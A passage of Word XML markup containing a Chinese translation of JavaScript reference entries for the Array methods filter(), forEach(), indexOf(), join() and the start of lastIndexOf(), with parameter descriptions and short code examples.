      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新数组，只包含那些让</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>返回真值的数组元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>会创建一个新数组，包含那些让</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>函数返回真值的</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不会修改</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>本身（注意</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>函数有可能会修改）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>按照序号从小到大遍历</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>，对每个元素仅调用一次</w:t>
      </w:r>
      <w:r>
        <w:t>predicate.</w:t>
      </w:r>
      <w:r>
        <w:t>对于序号</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>，调用</w:t>
      </w:r>
      <w:r>
        <w:t>predica</w:t>
      </w:r>
      <w:r>
        <w:t>te</w:t>
      </w:r>
      <w:r>
        <w:t>时带有三个参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>predicate(array[i],i,array)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>返回真值，则</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中序号为</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>的元素会追加到新创建的数组中。一旦</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>测试完</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中的每一个元素，它就会返回新创建的数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>更多细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>Array.forEach()</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[1,2,3].filter(function(x){return x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1;});//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3]</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Array.every()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.map()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.reduce()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="581" w:name="Array_forEach__"/>
      <w:r>
        <w:t>Array.forEach()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="581"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为每一个数组元素调用一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.forEach(f)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.forEach(f,o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的每一个元素调用的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>时的可选</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该方法无返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>按照序号从小到大遍历</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>，并对每一个元素调用一次</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。对于序号</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>，调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>时带有三个参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f(array[i],i,array)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的任何返回值都会忽略。注意</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>没有返回值。特别注意，它不会返回</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组方法的细节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下述细节适用于</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，也适用于相关方法：</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有这些方法都接受函数作为第一个参数，并接受可选的第二个参数。如果指定了第二个参数</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>，则调用函数时，就好像该函数是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的方法一样。也</w:t>
      </w:r>
      <w:r>
        <w:t>就是说，在函数体内，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值等于</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>。如果没有指定第二个参数，则就像函数一样调用该函数（而不像方法），</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值在非严格模式下是全局对象，在严格模式下则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>所有这些方法都会在开始遍历时就记录</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的长度。如果调用函数把新元素追加到</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中，这些新添加的元素不会遍历到。如果调用的函数修改了未遍历到的已存在元素，则调用时会传递修改后的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当作用于稀疏数组时，这些方法不会在实际上不存在元素的序号上调用函数。</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a=[1,2,3];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.forEach(function(x,i,a</w:t>
      </w:r>
      <w:r>
        <w:t>){a[i]++;});//a</w:t>
      </w:r>
      <w:r>
        <w:t>现在是</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3,4]</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Array.every()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.filter()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.map()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.reduce()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="582" w:name="Array_indexOf__"/>
      <w:r>
        <w:t>Array.indexOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="582"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>查找数组</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array.indexOf(value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.indexOf(value,start)</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t>要在</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中查找的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>开始查找的可选数组序号。如果省略，则为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个大于等于</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>的最小序号值，该序号值处的</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>元素与</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>全等。如果不存在匹配元素时，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</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该方法在</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中查找等于</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，并返回找到的第一个元素的序号。查找的起始位置是</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>指定的数组序号，如果没有指定，则从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始，然后一个接一个地查找，直到找到匹配的元素或检查完所有元素为止。判断是否相等使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>操作符。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回值是找到的第一个匹配元素的序号，如果没找到匹配的，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</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['a','b','c'].indexOf('b')//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>['a','b','c'].indexOf('d')//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>['a','b','c'].indexOf('a',1)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>-1</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Array.lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.indexOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="583" w:name="Array_join__"/>
      <w:r>
        <w:t>Array.join()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="583"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将数组元素衔接为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.join()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.join(separator)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>separator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在返回的字符串中，用来分隔数组的某个元素与下一个元素的可选字符或字符串。如果省略，默认是英文逗号（</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个字符串。将</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的每一个元素转化为字符串，然后用</w:t>
      </w:r>
      <w:r>
        <w:t>separator</w:t>
      </w:r>
      <w:r>
        <w:t>字符串分隔开，最后衔接为返回的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>join()</w:t>
      </w:r>
      <w:r>
        <w:t>将数组的每一个元素转换为字符串，并通过在中间插入指定的</w:t>
      </w:r>
      <w:r>
        <w:t>separator</w:t>
      </w:r>
      <w:r>
        <w:t>字符串将它们衔接起来，最后返回衔接好的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以进行相反的操作</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>将字符串分割成数组元素</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法即可。细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>String.split()</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a=new Array(1,2,3,"testing");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s=a.join("+");//s</w:t>
      </w:r>
      <w:r>
        <w:t>是字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"1+2+3+</w:t>
      </w:r>
      <w:r>
        <w:t>testing"</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String.split()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="584" w:name="Array_lastIndexOf__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Array.lastIndexOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="584"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>反向查找数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.lastIndexOf(value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>arrray.lastIndexOf(value,start)</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t>要在</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中查找的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
